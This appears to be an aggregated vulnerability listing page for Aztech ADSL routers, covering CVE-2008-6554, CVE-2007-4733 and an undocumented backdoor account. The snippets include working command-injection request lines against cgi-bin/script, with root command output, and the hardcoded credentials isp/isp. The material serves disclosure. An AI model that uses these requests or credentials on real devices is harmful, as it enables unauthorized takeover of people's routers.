CVE-2008-6554

The CVE-2008-6554 entry applies to Aztech ADSL2/2+ 4-port routers running version 3.7.0 build 070426. The vulnerability is in the CGI component (cgi-bin/script) where an attacker can supply shell metacharacters in the query string to execute arbitrary commands remotely. This could enable remote c...

CVE-2008-6554

cgi-bin/script in Aztech ADSL2/2+ 4-port router 3.7.0 build 070426 allows remote attackers to execute arbitrary commands via shell metacharacters in the query string...

Aztech ADSL2/2+ 4 Port default password

Playing around with the configuration files will reveal…..even though the admin accounts password has been changed, there is still another administrative account burried in there. username: isp password: isp Sneaks one past [email protected] http://www.elitter.net...

Aztech ADSL routers backdoor

It's possible to obtain administrative access with undocumented account isp/isp...

Aztech ADSL2/2+ 4 Port remote root

http://www.aztech.com cat versions VERSION=3.7.0 BUILD=070426 BOARD=AR7RD FSSTAMP=20070426171252 Example: $ lynx "http://192.168.0.5/cgi-bin/script?system20&20whoami" --source root $ lynx "http://192.168.0.5/cgi-bin/script?system20&20ls /" --source bin dev etc lib proc sbin usr var var.tar $...

AzTech routers command execution

It's possible to execute routers commands via web interface without authentication...

aztech-exec.txt

http://www.aztech.com cat versions VERSION=3.7.0 BUILD=070426 BOARD=AR7RD FSSTAMP=20070426171252 Example: $ lynx "http://192.168.0.5/cgi-bin/script?system%20&%20whoami" --source root $ lynx "http://192.168.0.5/cgi-bin/script?system%20&%20ls /" --source bin dev etc lib proc sbin usr var var.tar $...

Design/Logic Flaw

The Aztech DSL600EU router, when WAN access to the web interface is disabled, does not properly block inbound traffic on TCP port 80, which allows remote attackers to connect to the web interface by guessing a TCP sequence number, possibly involving spoofing of an ARP packet, a related issue to...

CVE-2007-4733

The Aztech DSL600EU router, when WAN access to the web interface is disabled, does not properly block inbound traffic on TCP port 80, which allows remote attackers to connect to the web interface by guessing a TCP sequence number, possibly involving spoofing of an ARP packet, a related issue to...

CVE-2007-4733

CVE-2007-4733 describes a vulnerability in the Aztech DSL600EU router where, even when WAN web UI access is disabled, inbound connections to TCP port 80 can reach the web interface by guessing the TCP Initial Sequence Number, potentially aided by ARP spoofing. This is a remote-access risk exploit...

CVE-2007-4733

The Aztech DSL600EU router, when WAN access to the web interface is disabled, does not properly block inbound traffic on TCP port 80, which allows remote attackers to connect to the web interface by guessing a TCP sequence number, possibly involving spoofing of an ARP packet, a related issue to...